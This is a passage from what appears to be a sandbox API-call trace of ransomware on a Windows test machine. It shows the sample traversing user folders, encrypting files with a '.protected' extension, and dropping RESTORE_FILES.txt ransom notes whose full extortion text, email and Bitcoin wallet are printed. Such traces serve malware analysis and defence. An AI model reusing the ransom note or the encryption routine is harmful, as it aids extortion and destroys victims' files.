hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0089.295] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0089.295] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\RESTORE_FILES.txt") returned 105 [0089.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\services\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0089.296] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.296] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0089.297] lstrlenA 
(lpString="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") returned 684 [0089.297] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0089.297] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.297] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0089.297] CloseHandle (hObject=0x14c) returned 1 [0089.297] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.297] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.297] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 96 [0089.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.297] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.297] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.298] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0089.298] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.298] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.298] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.298] CloseHandle (hObject=0xd8) returned 1 [0089.298] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.298] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.298] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt") returned 78 [0089.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt" (normalized: 
"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.299] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.299] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.300] lstrlenA 
(lpString="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") returned 684 [0089.300] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.300] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.300] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0089.300] CloseHandle (hObject=0xd4) returned 1 [0089.300] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="Windows") returned -1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="Program Files") returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="Program Files (x86)") returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="$Recycle.bin") returned 1 [0089.300] lstrcmpiW (lpString1="Sun", lpString2="System Volume Information") returned -1 [0089.300] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun") returned 54 [0089.300] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0089.300] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0089.300] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*") returned 56 [0089.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 
[0089.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.301] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.301] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.301] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.301] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\.") returned 56 [0089.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.301] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.301] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.301] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.301] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.301] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.301] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\..") returned 57 [0089.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.301] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="Windows") returned -1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="Program Files") returned -1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="Program Files (x86)") returned -1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="$Recycle.bin") returned 1 [0089.301] lstrcmpiW (lpString1="Java", lpString2="System Volume Information") returned -1 [0089.301] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java") returned 59 [0089.301] lstrcmpW (lpString1="Java", lpString2=".") returned 1 [0089.302] lstrcmpW (lpString1="Java", lpString2="..") returned 1 [0089.302] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*") returned 61 [0089.302] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.302] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.302] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.302] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.302] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.302] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.302] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\.") returned 61 [0089.302] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.302] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.302] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.302] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.302] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.303] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.303] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.303] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\..") returned 62 [0089.303] lstrcmpW 
(lpString1="..", lpString2=".") returned 1 [0089.303] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.303] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="Windows") returned -1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="Program Files") returned -1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="Program Files (x86)") returned -1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="$Recycle.bin") returned 1 [0089.303] lstrcmpiW (lpString1="AU", lpString2="System Volume Information") returned -1 [0089.303] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU") returned 62 [0089.303] lstrcmpW (lpString1="AU", lpString2=".") returned 1 [0089.303] lstrcmpW (lpString1="AU", lpString2="..") returned 1 [0089.303] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*") returned 64 [0089.303] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0089.303] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.304] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.304] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.304] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.304] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.304] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\.") returned 64 [0089.304] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0089.304] FindNextFileW (in: hFindFile=0x47ba90, 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.304] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.304] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.304] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.304] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.304] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.304] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\..") returned 65 [0089.304] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.304] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.304] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="Windows") returned -1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="Program Files") returned -1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="Program Files (x86)") returned -1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="$Recycle.bin") returned 1 [0089.304] lstrcmpiW (lpString1="au.cab", lpString2="System Volume Information") returned -1 [0089.304] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.304] StrStrIW (lpFirst="au.cab", lpSrch=".protected") returned 0x0 [0089.304] lstrcmpW (lpString1="au.cab", lpString2="RESTORE_FILES.txt") returned -1 [0089.304] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.304] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.304] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.305] StrStrW (lpFirst="au.cab", lpSrch=".txt") returned 0x0 [0089.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.305] StrStrW (lpFirst="au.cab", lpSrch=".rar") returned 0x0 [0089.305] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned 69 [0089.305] StrStrW (lpFirst="au.cab", lpSrch=".zip") returned 0x0 [0089.305] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.315] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.315] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.316] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.316] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0089.319] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, 
nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0089.320] CloseHandle (hObject=0x150) returned 1 [0089.320] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.protected") returned 79 [0089.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.protected")) returned 1 [0089.321] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="Windows") returned -1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="Program Files") returned -1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="Program Files (x86)") returned -1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="$Recycle.bin") returned 1 [0089.321] lstrcmpiW (lpString1="au.msi", lpString2="System Volume Information") returned -1 [0089.321] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.321] StrStrIW (lpFirst="au.msi", lpSrch=".protected") returned 0x0 [0089.321] lstrcmpW (lpString1="au.msi", lpString2="RESTORE_FILES.txt") returned -1 [0089.321] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0089.321] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: 
pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0089.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0089.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.322] StrStrW (lpFirst="au.msi", lpSrch=".txt") returned 0x0 [0089.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.322] StrStrW (lpFirst="au.msi", lpSrch=".rar") returned 0x0 [0089.322] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned 69 [0089.322] StrStrW (lpFirst="au.msi", lpSrch=".zip") returned 0x0 [0089.322] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.324] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.324] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0089.324] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.324] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, 
